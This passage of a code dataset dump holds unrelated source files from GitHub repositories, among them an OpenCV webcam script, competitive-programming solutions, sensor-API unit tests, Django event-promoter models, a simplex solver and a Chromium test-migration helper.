rosembrock = Rosembrock(30)\n\n fss = FSSII(30, 0.4, esfera)\n history=fss.run()\n convergencia = open('results_fss2_rastrigin.txt', 'w')\n convergencia.writelines(history)\n #print fss\n","repo_name":"ja1goncalves/analysis-volitive-gwo","sub_path":"Origins Algoritms/FSS2.py","file_name":"FSS2.py","file_ext":"py","file_size_in_byte":10358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4459355562","text":"import cv2\nimport datetime\nimport numpy as np\n\ncap=cv2.VideoCapture(0)\n\n##the camera will take only the available nearest resolution\ncap.set(3,1280) ## frame width\ncap.set(4,720) ## frame height\n\nwhile True:\n success,frame=cap.read()\n\n frame=cv2.flip(frame,1)\n # 0 for vertically\n # 1 for horizontally\n # -1 for both hori and verti\n\n text='Width: '+str(cap.get(3))+' Height: '+str(cap.get(4))\n datet=str(datetime.datetime.now())\n frame = cv2.putText(frame,datet, (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 233, 233), 2, cv2.LINE_AA)\n # frame = cv2.putText(frame,text,(10,30),cv2.FONT_HERSHEY_SIMPLEX,1,(0,233,233),2,cv2.LINE_AA)\n cv2.imshow('video capture',frame)\n\n if cv2.waitKey(1) & 0xFF== ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"saboo-vivek/OpenCv2","sub_path":"add text to videos.py","file_name":"add text to videos.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36375541068","text":"# 피보나치 함수\r\n\r\nimport sys\r\ninput = sys.stdin.readline \r\nsys.setrecursionlimit(1000)\r\n\r\nT = int(input())\r\n\r\ndef fibonacci(n):\r\n for i in range(2, n+1) :\r\n zero = answer[i-1][0] + answer[i-2][0]\r\n one = answer[i-1][1] + answer[i-2][1]\r\n answer.append([zero, one])\r\n \r\nfor i in range(T):\r\n n = int(input())\r\n answer = [[1,0], [0,1]]\r\n\r\n if n == 0 :\r\n print(answer[n][0], answer[n][1])\r\n elif n == 1 :\r\n print(answer[n][0], answer[n][1])\r\n else : \r\n fibonacci(n)\r\n print(answer[n][0], answer[n][1])","repo_name":"dlwlals1289/Sol_Algorithm","sub_path":"백준/Silver/1003. 
피보나치 함수/피보나치 함수.py","file_name":"피보나치 함수.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20955662207","text":"import requests, random, math, unittest, logging, json\nfrom datetime import timedelta\n\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)\n\n\nhost = 'https://grogdata.soest.hawaii.edu'\n#host = 'http://192.168.0.30'\n\n\ndef test1(ep):\n \"\"\"Check that the endpoint is available, and there's no None, NaN, or inf/-inf in the response.\"\"\"\n logging.debug('Testing {}'.format(ep))\n result = True\n\n r = requests.get(ep)\n result &= r.status_code == 200\n r = r.json()\n x,y = zip(*r)\n\n def p(v):\n return v is not None and not math.isnan(v) and v not in [float('-inf'), float('inf')]\n\n result &= all([p(tmp) for tmp in x])\n result &= all([p(tmp) for tmp in y])\n return result\n\n\nclass TestAPI(unittest.TestCase):\n\n def testxy2(self):\n # tide gauges\n nodes = ['node-008',\n 'node-009',\n 'node-014',\n 'node-046',\n 'node-048',\n 'node-049',\n 'node-051',\n 'node-070',\n 'node-097',]\n\n for node in nodes:\n end = 1615178655\n begin = end - timedelta(days=7).total_seconds()\n # no longer checks if node is in site.\n ep = '/data/2/{node}/ReceptionTime,d2w.json?begin={begin}&end={end}&time_col=ReceptionTime'.\\\n format(node=node,\n begin=begin,\n end=end)\n ep = host + ep\n try:\n result = test1(ep)\n except:\n print(ep)\n result = False\n if not result:\n logging.warning('FAILED: ' + ep)\n self.assertTrue(False)\n\n def testxy3(self):\n # tide gauges\n nodes = ['node-008',\n 'node-009',\n 'node-014',\n 'node-046',\n 'node-048',\n 'node-049',\n 'node-051',\n 'node-070',\n 'node-097',]\n\n for node in nodes:\n end = 1615178655\n begin = end - timedelta(days=7).total_seconds()\n # no longer checks if node is in site.\n ep = '/data/3/{node}/ReceptionTime,d2w.json?begin={begin}&end={end}&time_col=ReceptionTime'.\\\n format(node=node,\n begin=begin,\n end=end)\n ep = host + ep\n try:\n result = test1(ep)\n except:\n print(ep)\n result = False\n if not result:\n logging.warning('FAILED: ' + ep)\n self.assertTrue(False)\n\n def testdataapiformat(self):\n # make sure there's a time_col even though it's not specified in the link\n url = host + '/data/2/node-009/ReceptionTime,d2w.json?begin=1505513530.79&end=1506118330.79&time_col=ReceptionTime'\n r = requests.get(url)\n self.assertTrue(r.status_code == 200)\n r = r.json()\n self.assertTrue(len(r) > 0)\n\n def test_no_inf(self):\n ep = '/data/2/base-005/ReceptionTime,uptime_second.json?begin=1506802303.13&end=1509394303.13&time_col=ReceptionTime'\n ep = host + ep\n logging.debug('Testing {}'.format(ep))\n self.assertTrue(test1(ep))\n r = requests.get(ep).json()\n x,y = zip(*r)\n self.assertTrue(float('inf') not in x)\n self.assertTrue(float('-inf') not in x)\n self.assertTrue(float('nan') not in x)\n self.assertTrue(float('inf') not in y)\n self.assertTrue(float('-inf') not in y)\n self.assertTrue(float('nan') not in y)\n\n def testmisc(self):\n eps = [\n '/poh/nodepage/node-004.json',\n '/poh/nodepage/node-021.json',\n #'/poh/data/node-021/PH_EXT.json?begin=1480800106&end=1480808106&max_count=5',\n #'/makaipier/data/node-010/d2w.json?begin=1480800106&end=1480808106',\n #'/poh/data/node-022/PH_EXT.json?begin=1480800106&end=1480808106&max_count=5',\n '/static/uhcm/img/poh/node-004/AirSaturation.json',\n\n '/poh/data/dashboard.json',\n 
#'/poh/data/meteorological.json',\n #'/poh/data/makaha/makaha1.json',\n #'/poh/data/makaha/makaha2.json',\n #'/poh/data/makaha/triplemakahab.json',\n\n #'/poh/data/location/makaha1/depth.json?minutes=10080&max_count=1000',\n #'/poh/data/location/makaha1/depth.json',\n #'/poh/data/location/makaha1/depth.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha1/depth.json?minutes=60',\n #'/poh/data/location/makaha1/depth.json?begin=1478030000&end=1478037569&max_count=1000',\n #'/poh/data/location/makaha1/oxygen.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha1/air.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha1/temperature.json?begin=1485980000&end=1485986255',\n\n #'/poh/data/location/makaha2/depth.json',\n #'/poh/data/location/makaha2/depth.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha2/depth.json?minutes=60',\n #'/poh/data/location/makaha2/depth.json?begin=1478030000&end=1478037569&max_count=1000',\n\n #'/makaipier/data/location/dock1/depth.json',\n #'/makaipier/data/location/dock1/depth.json?begin=1485980000&end=1485986255',\n #'/makaipier/data/location/dock1/depth.json?minutes=60',\n #'/makaipier/data/location/dock1/depth.json?begin=1478400000&end=1485900000&max_count=1000',\n ]\n\n for ep in eps:\n ep = host + ep\n logging.debug('Testing {}'.format(ep))\n code = requests.get(ep).status_code\n if code != 200:\n logging.warning(ep)\n self.assertTrue(False)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"stanleylio/cm1app","sub_path":"cm1app/tests/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"2587989788","text":"import numpy as np\nimport pandas as pd\n\ndef director_value(movie):\n \"\"\"\n input: movie (each row in all_data_df)\n output: \n - film_count: number of movies directed before the movie of interest\n - avg_rating: average rating of movies directed before the movie of interest\n - avg_gross: gross per movie before the movie of interest\n \"\"\"\n \n movie_title = movie.movie_title\n director = movie.director\n year = movie.release_date\n\n headers = ['movie_title','director','film_count_d','avg_rating_d','avg_gross_d']\n \n # Assign default values\n film_count,avg_rating,avg_gross = 0, director_rating_mean, director_gross_mean\n \n doi_df = director_df[(director_df.director == director) & (director_df.year < year)]\n \n # Fill NaN with director's mean\n doi_df[['rating','gross_usa']].apply(lambda x: x.fillna(x.mean(),axis=0))\n \n # If there's still NaN, fill with all directors' mean\n doi_df[['rating']] = doi_df[['rating']].apply(lambda x: x.fillna(director_rating_mean,axis=0))\n doi_df[['gross_usa']] = doi_df[['gross_usa']].apply(lambda x: x.fillna(director_gross_mean,axis=0))\n \n \n if doi_df.shape[0] == 0:\n film_count,avg_rating,avg_gross = 0, director_rating_mean, director_gross_mean\n else:\n \n \n \n film_count = doi_df.shape[0]\n\n \n avg_rating = doi_df['rating'].mean()\n if avg_rating == np.nan:\n avg_rating = director_rating_mean\n\n try:\n avg_gross = int(doi_df['gross_usa'].mean())\n except ValueError:\n avg_gross = director_gross_mean\n \n \n director_value = dict(zip(headers, [movie_title,director,film_count,avg_rating,avg_gross]))\n \n return director_value\n\n\n\ndef actor_value(actor,year):\n \"\"\"\n input: actor name and (release) year of the movie of interest\n output: \n - film_count: number of movies the actor was in 
before the movie of interest\n - avg_rating: average rating of movies the actor was in before the movie of interest\n - avg_gross: gross per movie before the movie of interest\n \"\"\"\n \n aoi_df = actor_df[(actor_df.actor == actor) & (actor_df.year.dt.year < year)].copy()\n \n # Fill NaN with actor's mean\n values={'rating':aoi_df.rating.mean(), 'gross_usa':aoi_df.gross_usa.mean()}\n aoi_df.fillna(value=values,inplace=True)\n \n # If there's still NaN, fill with all actors' mean\n values={'rating':actor_rating_mean, 'gross_usa':actor_gross_mean}\n aoi_df.fillna(value=values,inplace=True)\n \n \n # If there's no movie prior to movie of interest \n if aoi_df.shape[0] == 0:\n film_count,avg_rating,avg_gross = 0, actor_rating_mean, actor_gross_mean\n \n else:\n \n film_count = aoi_df.shape[0]\n \n avg_rating = aoi_df['rating'].mean()\n avg_gross = aoi_df['gross_usa'].mean()\n\n \n \n actor_value = [film_count, avg_rating, avg_gross]\n \n print(actor,actor_value)\n \n return actor_value,aoi_df\n\n\n\n\ndef get_cast(movie):\n \"\"\"\n input: movie (each row in all_data_df)\n output: \n - film_count: number of movies directed before the movie of interest\n - avg_rating: average rating of movies directed before the movie of interest\n - avg_gross: gross per movie before the movie of interest\n \"\"\"\n \n movie_title = movie.movie_title\n year = movie.release_year\n actors = movie.actor\n lead = actors[0]\n \n film_counts = []\n ratings = []\n grosses = []\n \n for actor in actors:\n result = actor_value(actor,year)\n film_counts.append(result[0])\n ratings.append(result[1])\n grosses.append(result[2])\n \n avg_film_count = np.mean(film_counts)\n avg_rating = np.mean(ratings)\n avg_gross = np.mean(grosses) \n \n \n lead_result = actor_value(lead,year)\n \n\n headers = ['movie_title','cast','avg_film_count_c','avg_rating_c','avg_gross_c',\\\n 'avg_film_count_l','avg_rating_l','avg_gross_l']\n\n \n \n cast_info = dict(zip(headers, [movie_title,actors,avg_film_count,avg_rating,avg_gross,\\\n lead_result[0],lead_result[1],lead_result[2]]))\n \n return cast_info","repo_name":"katiehuang1221/Predict-Revenue-Of-Movie-Adaptation","sub_path":"py/get_cast.py","file_name":"get_cast.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34112258458","text":"S = input()\nT = input()\ncnt = 0\nfor i, s in enumerate(S[-len(T):]):\n if T[i] == s or (s == \"?\" or T[i] == \"?\"):\n cnt += 1\nans = [\"Yes\" if cnt == len(T) else \"No\"]\nfor idx in range(len(T)):\n added, popped = S[idx], S[-len(T) + idx]\n if T[idx] != \"?\" and (popped == \"?\" or popped == T[idx]):\n cnt -= 1\n if T[idx] != \"?\" and (added == \"?\" or added == T[idx]):\n cnt += 1\n ans.append(\"Yes\" if cnt == len(T) else \"No\")\nprint(*ans, sep=\"\\n\")\n","repo_name":"kazu0716/programing_training","sub_path":"atcoder/ABC/287/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7355904461","text":"#!/usr/bin/env python3\n'''\nSet combos.\n\nThe rule is: two keys are a combo.\n'''\nimport sys\nimport pygame\nfrom pygame.locals import *\nfrom .controller import (\n Controller,\n set_controllers_verbose,\n)\nfrom .controls import (\n controller1,\n get_button_if_exists,\n)\nfrom .pygameinput import(\n read_event,\n)\n\nwatched = ('jump', 'x<0', 'x>0', 'nab')\nwaspressed = dict((k, False) for k in watched)\ncombokeys = 
set()\ncombostart = None\ncombodict = {}\n\n\ndef addcombo(keys, name):\n combodict[tuple(sorted(keys))] = name\n\n\naddcombo(('nab',), \"nab\") # formerly K_SPACE\naddcombo(('jump',), \"leap\") # formerly K_UP\naddcombo(('x<0',), \"turn-r\") # formerly K_LEFT\naddcombo(('x>0',), \"turn-l\") # formerly K_RIGHT\n# ^ Why they are opposite: turning in mid-air is the combo\naddcombo(('jump', 'nab'), \"twirl\") # formerly (K_UP, K_SPACE)\naddcombo(('x>0', 'nab'), \"roll-r\") # formerly (K_RIGHT, K_SPACE)\naddcombo(('x<0', 'nab'), \"roll-l\") # formerly (K_LEFT, K_SPACE)\naddcombo(('x>0', 'jump'), \"dart-r\") # formerly (K_RIGHT, K_UP)\naddcombo(('x<0', 'jump'), \"dart-l\") # formerly (K_LEFT, K_UP)\n# ^ bound and dart are opposites\n# - See feat.py\n\n\nfrom enum import Enum\n\n\ndef error(msg):\n sys.stderr.write(\"{}\\n\".msg)\n\n\ndef equalsPart(list1, list2):\n count = int(min(len(list1), len(list2)))\n for i in range(count):\n if list1[i] is not list2[i]:\n return False\n return True\n\n\ndef get_combo(controller1):\n global waspressed, combokeys, combostart\n\n ispressed = dict((k, controller1.getBool(k)) for k in watched)\n newkeys = [k for k in watched if ispressed[k] and not waspressed[k]]\n r = ()\n if combokeys:\n # print(\"combokeys:{}\".format(combokeys))\n if not all(controller1.getBool(k) for k in combokeys): # End the combo now\n r = combokeys\n if newkeys:\n combokeys = set(newkeys)\n combostart = pygame.time.get_ticks()\n else:\n combokeys = set()\n combostart = None\n elif newkeys:\n combokeys |= set(newkeys)\n if combokeys and pygame.time.get_ticks() - combostart > 100: # Combo timed out\n r = combokeys\n combokeys = set()\n combostart = None\n elif newkeys:\n combokeys = set(newkeys)\n combostart = pygame.time.get_ticks()\n waspressed = ispressed\n r = tuple(sorted(r))\n return combodict[r] if r in combodict else \"\"\n\n\nif __name__ == \"__main__\":\n\n # Go to a module test mode if the module runs directly.\n pygame.init()\n pygame.joystick.init()\n joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]\n print(\"Pygame found {} joystick(s).\".format(len(joysticks)))\n if len(joysticks) > 0:\n for joystick in joysticks:\n joystick.init()\n pygame.display.set_mode((800, 300))\n clock = pygame.time.Clock()\n while True:\n dt = clock.tick(60) * 0.001\n for event in pygame.event.get():\n result = 0\n if event.type == QUIT:\n sys.exit()\n else:\n result = read_event(controller1, event)\n # k = pygame.key.get_pressed()\n # pressed = controller1.toKeys()\n # read_joysticks(controller1, joysticks)\n # k = controller1.toKeys()\n kcombo = get_combo(controller1)\n if kcombo:\n print(kcombo)\n if controller1.getBool('EXIT'):\n sys.exit()\n\n","repo_name":"Poikilos/lepidopterist","sub_path":"src/combo.py","file_name":"combo.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73795603524","text":"from django.db import models\nfrom django.conf import settings\nfrom django.core.validators import RegexValidator\nimport qrcode\nimport qrcode.image.svg\n\nclass Promoter(models.Model):\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n email = models.EmailField()\n phone_regex = RegexValidator(regex=r'^\\+?1?\\d{9,15}$', message=\"Phone number must be entered in the format: '+999999999'. 
Up to 15 digits allowed.\")\n phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list\n\n def __str__(self):\n return \"Promoter: {0} {1}\".format(self.first_name, self.last_name)\n \n def full_name(self):\n return \"{0} {1}\".format(self.first_name, self.last_name)\n\nclass Location(models.Model):\n name = models.CharField(max_length=255)\n address1 = models.CharField(\n \"Address line 1\",\n max_length=1024,\n )\n address2 = models.CharField(\n \"Address line 2\",\n max_length=1024,\n blank=True,\n default=''\n )\n zip_code = models.CharField(\n \"ZIP / Postal code\",\n max_length=12,\n )\n city = models.CharField(\n \"City\",\n max_length=1024,\n )\n country = models.CharField(\n \"Country\",\n max_length=3,\n default='USA',\n )\n phone_regex = RegexValidator(regex=r'^\\+?1?\\d{9,15}$', message=\"Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.\")\n phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list\n\n def __str__(self):\n return \"Location record for {0}\".format(self.name)\n\nclass Event(models.Model):\n name = models.CharField(max_length=255)\n date = models.DateField()\n location = models.ForeignKey(\n Location,\n on_delete=models.CASCADE,\n verbose_name=\"the location of the event\",\n )\n\n def __str__(self):\n return \"{0} on {1}\".format(self.name, self.date)\n\nclass EventPromoter(models.Model):\n\n actions = ['generate_qr_code']\n\n event = models.ForeignKey(\n Event,\n on_delete=models.PROTECT,\n verbose_name=\"the event\",\n )\n promoter = models.ForeignKey(\n Promoter,\n on_delete=models.PROTECT,\n verbose_name=\"the promoter\",\n )\n\n def generate_qr_code(self):\n location = '{BASE_URL}/api/event_promoter/{promoter_id}/'.format(\n BASE_URL = settings.APP_LOCATION,\n promoter_id = self.pk\n )\n img = qrcode.make(location)\n return img \n \n def __str__(self):\n print(self.__dict__)\n return \"{0} {1} promotion for event: {2}\".format(self.promoter.first_name, self.promoter.last_name, self.event.name)\n\nclass EventPromoterRegister(models.Model):\n event_promoter = models.ForeignKey(\n EventPromoter,\n on_delete=models.DO_NOTHING,\n verbose_name=\"the event promoter\",\n )\n timestamp = models.DateTimeField(auto_now_add=True)\n","repo_name":"tylerblox/QRTracker","sub_path":"backend/qrtracker/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4681998731","text":"\n\n# def parse_factors(func: str, coef: int = 1) -> list:\n# func_factors = []\n# func = func.split()\n# for i in range(len(func)):\n# if \"x_\" in func[i]:\n# if func[i].find(\"x_\") == 0:\n# to_add = 1\n# else:\n# to_add = int(func[i][:func[i].find(\"x_\")])\n# func_factors.append(\n# coef*to_add)\n# if (func[i-1] == \"-\"):\n# func_factors[-1] *= -1\n# return func_factors\n\n\n# input_ = [\"F = 4x_1 + 5x_2 + 4x_3 -> max\",\n# \"2x_1 + 3x_2 + 6x_3 <= 240\",\n# \"4x_1 + 2x_2 + 4x_3 <= 200\",\n# \"4x_1 + 6x_2 + 8x_3 <= 160\",\n# \"x_1, x_2, x_3 >= 0\"]\n\n\nfrom termcolor import colored\n\n# Находим те индексы которые относятся к базису ([0, 0, 1, 1, 1] -> [2, 3, 4])\n\n\ndef calc_basis_indexes(basis: list) -> list:\n return list(filter(lambda x: x != -1, map(lambda x: x if basis[x] else -1, range(len(basis)))))\n\n\n# Считаем оценку, позволяющую понять, что следует ввести в базис или найдено ли оптимальное решение\ndef 
calculate_costs(function, basis, factors):\n costs = []\n basis_indexes = calc_basis_indexes(basis)\n for i in range(len(function)):\n subtotal = -function[i]\n for j in range(len(basis_indexes)):\n subtotal += function[basis_indexes[j]] * factors[j][i]\n costs.append(subtotal)\n return costs\n\n\n# Дополняем наш вектор решений нулями\ndef extend_solutions(solutions, basis):\n res = list(solutions)\n for i in range(len(basis)):\n if basis[i] == 0:\n res.insert(i, 0)\n return res\n\n\n# Тут должно быть очевидно\ndef dot_product(op1, op2):\n return [op1[i] * op2[i] for i in range(len(op1))]\n\n\n# Какой-никакой, но форматированный вывод\ndef print_table(function, factors, basis, solutions, end=False):\n func = [f\"{i:^11.2f}\" for i in function]\n fact = [[f\"{j:^11.2f}\" for j in i] for i in factors]\n sols = extend_solutions(solutions, basis)\n sols.append(sum(dot_product(sols, function)))\n sols = [f\"{i:^11.2f}\" for i in sols]\n basis_indexes = calc_basis_indexes(basis)\n bas = [f\"| x{i+1:<3d} \" for i in basis_indexes]\n separator = \"+-------\"+\"+-----------\"*(len(func)+1)+\"+\"\n costs = [f\"{i:^11.2f}\" for i in calculate_costs(\n function, basis, factors)]\n print(separator)\n print(\"| f =\" + \"+\".join(func) + \"=\" +\n colored(sols[-1], \"green\" if end else 'red')+\"|\")\n print(\"| x = (\" + \",\".join(sols[:-1]) + \")\" + \" |\")\n print(separator)\n print(\"| \", *\n [f\"| x{i+1:<5d}\" for i in range(len(func))], \"| |\")\n for i in range(len(fact)):\n print(bas[i], *fact[i], sols[basis_indexes[i]], sep=\"|\", end=\"|\\n\")\n print(separator)\n print(\"| Δ \", *costs, \" \", sep=\"|\", end=\"|\\n\")\n print(separator)\n\n\n# Данные\nfunction = [4, 5, 4, 0, 0, 0]\n\nfactors = [[2, 3, 6, 1, 0, 0],\n [4, 2, 4, 0, 1, 0],\n [4, 6, 8, 0, 0, 1]]\n\nbasis = [0, 0, 0, 1, 1, 1]\n\nsolutions = [240, 200, 160]\n\n\nprint_table(function, factors, basis, solutions)\n","repo_name":"atella123/Symplex-method","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"71259145284","text":"# coding:utf-8\n\nimport cv2 as cv\nimport numpy as np\n\n\ndef big_image_binary(image):\n print(image.shape)\n cw = 256\n ch = 256\n h, w = image.shape[:2]\n gary = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n for row in range(0, h, ch):\n for col in range(0, w, cw):\n roi = gary[row:row+ch, col:cw+col]\n dev = np.std(roi)\n if dev < 15:\n gary[row:row + ch, col:cw + col] = 255\n else:\n ret, dst = cv.threshold(roi, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)\n gary[row:row + ch, col:cw + col] = dst\n\n print(np.std(dst), np.mean(dst))\n cv.imwrite(\"result_binary.png\", gary)\n \n\nsrc = cv.imread(\"opencv-4.4.0/data/test123.png\")\n# cv.namedWindow(\"the first image\", cv.WINDOW_AUTOSIZE)\n# cv.imshow(\"the first image\", src)\nbig_image_binary(src)\ncv.waitKey(0)\ncv.destroyAllWindows()\n\n\n# 测试功能\n# 超大图像二值化\n# 代码编写时间 2020.8.15\n","repo_name":"STLLYM/Opencv_python_learning","sub_path":"oversize_image_bin.py","file_name":"oversize_image_bin.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31625746262","text":"import logging\nimport os\n\nfrom absl import app\nfrom absl import flags\n\nimport tensorflow as tf\n\nfrom contrack import data\nfrom contrack import encoding\nfrom contrack import env\nfrom contrack import model\n\nflags.DEFINE_string('model_path', '',\n 'Base 
output directory where the model is stored.')\nflags.DEFINE_string('config_path', '', 'File path of config json file.')\nflags.DEFINE_string(\n 'config_json', '',\n 'The contents of a json config file if --config_file was not provided.')\nflags.DEFINE_string(\n 'mode', '',\n 'How to train the model, either \"only_new_entities\", \"only_tracking\", \"full\" or \"two_steps\".'\n)\nflags.DEFINE_string(\n 'train_data_glob', '',\n 'A TF glob pattern specifying the location of the training data files.')\nflags.DEFINE_string(\n 'eval_data_glob', '',\n 'A TF glob pattern specifying the location of the validation data files.')\nFLAGS = flags.FLAGS\n\n\ndef train(argv):\n \"\"\"Train a contrack model.\"\"\"\n del argv # Unused.\n\n mode = FLAGS.mode\n if FLAGS.config_path:\n config = env.ContrackConfig.load_from_path(FLAGS.config_path)\n elif FLAGS.config_json:\n config = env.ContrackConfig.load_from_json(FLAGS.config_json)\n else:\n raise ValueError('Must provide --config_path or --config_json')\n\n logging.info('Training with config:\\n%s', config)\n encodings = encoding.Encodings()\n env.Env.init(config, encodings)\n environment = env.Env.get()\n\n logging.info('Reading training data from %s', FLAGS.train_data_glob)\n train_data = data.read_training_data(FLAGS.train_data_glob, config, encodings)\n\n if FLAGS.eval_data_glob:\n logging.info('Reading validation data from %s', FLAGS.eval_data_glob)\n eval_data = data.read_eval_data(FLAGS.eval_data_glob, config, encodings)\n else:\n eval_data = None\n\n tensorboard_dir = os.path.join(FLAGS.model_path, 'tensorboard')\n checkpoint_dir = os.path.join(FLAGS.model_path, 'checkpoints')\n callbacks = [\n tf.keras.callbacks.TensorBoard(log_dir=tensorboard_dir),\n tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_dir),\n tf.keras.callbacks.TerminateOnNaN()\n ]\n\n\n # Compile model\n if mode == 'only_new_entities' or mode == 'full' or mode == 'only_tracking':\n contrack_model = model.ContrackModel(mode)\n loss = model.ContrackLoss(mode)\n metrics = model.build_metrics(mode)\n optimizer = tf.keras.optimizers.Adam(learning_rate=config.learning_rate)\n contrack_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n\n # Do the actual training\n contrack_model.fit(\n x=train_data,\n epochs=int(config.max_steps / config.steps_per_epoch),\n callbacks=callbacks,\n steps_per_epoch=config.steps_per_epoch,\n validation_data=eval_data)\n elif mode == 'two_steps':\n logging.info('Training new entity model...')\n new_id_model = model.ContrackModel('only_new_entities')\n loss = model.ContrackLoss('only_new_entities')\n metrics = model.build_metrics('only_new_entities')\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=config.learning_rate, clipnorm=1.0)\n new_id_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n new_id_model.fit(\n x=train_data,\n epochs=int(config.max_steps / config.steps_per_epoch),\n callbacks=callbacks,\n steps_per_epoch=config.steps_per_epoch,\n validation_data=eval_data)\n\n logging.info('Training tracking model...')\n contrack_model = model.ContrackModel('only_tracking')\n loss = model.ContrackLoss('only_tracking')\n metrics = model.build_metrics('only_tracking')\n optimizer = tf.keras.optimizers.Adam(learning_rate=config.learning_rate)\n contrack_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n contrack_model.init_weights_from_new_entity_model(new_id_model)\n contrack_model.fit(\n x=train_data,\n epochs=int(config.max_steps / config.steps_per_epoch),\n callbacks=callbacks,\n 
steps_per_epoch=config.steps_per_epoch,\n validation_data=eval_data)\n else:\n raise ValueError('Unknown mode \"%s\"' % mode)\n\n # Save it\n filepath = FLAGS.model_path\n with tf.keras.utils.custom_object_scope(model.get_custom_objects()):\n tf.keras.models.save_model(contrack_model, filepath)\n environment.config.save(filepath)\n environment.encodings.save(filepath)\n\n\nif __name__ == '__main__':\n app.run(train)\n","repo_name":"google-research/google-research","sub_path":"contrack/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"806967687","text":"#!/usr/bin/env python\n\nimport model\nimport test_convert_agent\nimport base_agent\n\nimport codecs\nimport jinja2\nimport logging\nimport re\nimport os\n\n_TEST_COMMON_JINJA_TEMPLATE = \"\"\"\n// Copyright 2017 The Chromium Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\npackage {{ package }};\n\n{%for i in imports%}\n{{ i }}\n{% endfor %}\n\n// TODO(yolandyan): move this class to its test rule once JUnit4 migration is over\nfinal class {{classname}} {\n {% for f in fields %}\n {{ f }}\n {% endfor %}\n private final {{common_callback}} mCallback;\n\n {{classname}}({{common_callback}} callback) {\n mCallback = callback;\n }\n\n {% for m in methods %}\n {{ m }}\n {% endfor %}\n\n public interface {{common_callback}} {\n //FILL_CALLBACK\n }\n}\n\"\"\"\n\n_TEST_RULE_JINJA_TEMPLATE = \"\"\"\n\n// Copyright 2017 The Chromium Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\npackage {{ package }};\n\n{%for i in imports%}\n{{ i }}\n{% endfor %}\n\npublic class {{classname}} extends FILL_SUPER implements {{common_callback}} {\n {% for f in fields %}\n {{ f }}\n {% endfor %}\n\n private final {{testcommon}} mTestCommon;\n\n public {{classname}}(Class<> activityClass) {\n super(activityClass);\n mTestCommon = new {{testcommon}}(this);\n }\n\n {% for m in methods %}\n {{ m }}\n {% endfor %}\n}\n\"\"\"\n\n\nclass BaseCaseAgent(test_convert_agent.TestConvertAgent):\n \"\"\"\n Agent used to convert test base class, generate TestCommon and TestRule file\n \"\"\"\n @classmethod\n def ignore_files(cls):\n return ['chrome/test/android/javatests/src/org/chromium/chrome/test/\\\n ChromeActivityTestCaseBase.java']\n\n @classmethod\n def filename_match(cls, whole_path):\n if whole_path.endswith('TestBase.java'):\n return True\n if whole_path.endswith('TestCaseBase.java'):\n return True\n else:\n return False\n\n @staticmethod\n def class_runner():\n raise Exception(\"This should not be called\")\n\n @staticmethod\n def raw_api_mapping():\n return {}\n\n def _object_to_string(self,element):\n return self.content[\n self._lexposToLoc(element.lexpos):self._lexposToLoc(element.lexend)+1]\n\n def _all_objects_to_string_list(self, elements):\n return [self._object_to_string(e) for e in elements]\n\n def getPackage(self):\n return self.element_table[model.PackageDeclaration][0].name.value\n\n def implementsTestCommonCallback(self, common_callback_class_name):\n self._replaceString(\n r'(^public.*?){', r'\\1implements %s {' % common_callback_class_name,\n element=self.main_class)\n\n def createGetter(self, field):\n try:\n variable_name = field.variable_declarators[0].variable.name\n if variable_name.startswith('m'):\n method_name = variable_name[1:]\n elif 
